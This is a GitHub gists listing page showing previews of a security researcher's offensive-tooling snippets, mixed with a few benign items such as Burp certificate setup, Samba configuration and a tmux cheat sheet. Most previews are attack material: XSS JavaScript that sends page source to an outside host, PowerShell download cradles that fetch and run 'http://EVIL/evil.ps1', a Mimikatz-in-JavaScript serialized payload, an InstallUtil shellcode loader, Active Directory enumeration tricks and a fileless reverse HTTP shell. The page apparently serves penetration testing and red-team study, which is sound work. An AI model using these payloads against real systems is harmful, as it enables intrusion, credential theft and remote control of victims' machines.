Skip to content

Instantly share code, notes, and snippets.

View interference-security's full-sized avatar

Abhineet Jayaraj interference-security

259 followers · 10 following
View GitHub Profile
@interference-security
interference-security / send_html_source_using_xss.js
Created June 1, 2018 01:37
JavaScript code to send HTML+JS source of current page using XSS
//Using GET method
//Use it for URL encoded data delivery
d=encodeURI(document.documentElement.outerHTML)
//Use it for base64 encoded data delivery
//d=window.btoa(document.documentElement.outerHTML)
x = new XMLHttpRequest();
x.open("GET","//your_site:8000?d="+d,true)
x.send();
@interference-security
interference-security / linux-https-proxy.txt
Last active April 17, 2018 09:03
Linux System-level HTTP(S) proxy
Generate "burp.der" certificate
Convert DER to PEM:
openssl x509 -inform der -in burp.der -out burp.pem
Install Burp certificate in Linux:
cp burp.pem /etc/ssl/certs/
update-ca-certificates
cp burp.pem burp.crt
cp burp.crt /usr/local/share/ca-certificates/
@interference-security
interference-security / Samba-Kali
Created January 1, 2018 17:17
apt-get install samba
cd /etc/samba/
Optional:
rm smb.conf
touch smb.conf
nano smb.conf
[Name you want to get shown of the folder]
path = path of folder you want to share
@interference-security
interference-security / msfvenom-reverse-tcp-WaitForSingleObject.md
Created December 10, 2017 11:07 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@interference-security
interference-security / katz.js
Created November 20, 2017 09:04
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@interference-security
interference-security / InstallUtil-Shellcode-cs
Created November 16, 2017 18:01 — forked from lithackr/InstallUtil-Shellcode-cs
From https://gist.github.com/subTee/408d980d88515a539672
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@interference-security
interference-security / DownloadCradles.ps1
Created September 11, 2017 19:45 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@interference-security
interference-security / PowerView-2.0-tricks.ps1
Created March 22, 2017 09:47 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
@interference-security
interference-security / gist:5b4a8a1321da6b6854c02adaf0e322d9
Last active April 4, 2016 12:37 — forked from slacka/gist:72739e9d848523ed48b1
screen and tmux cheat sheet

http://www.mechanicalkeys.com/files/os/notes/tm.html

The formatting here is simple enough to understand (I would hope). ^ means ctrl+, so ^x is ctrl+x. M- means meta (generally left-alt or escape)+, so M-x is left-alt+x

It should be noted that this is no where near a full feature-set of either group. This - being a cheat-sheet - is just to point out the most very basic features to get you on the road.

Action tmux screen
start a new session tmux ORtmux new ORtmux new-session screen
re-attach a detached session tmux attach ORtmux attach-session screen -r
@interference-security
interference-security / JSRat.ps1
Created January 25, 2016 09:58
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.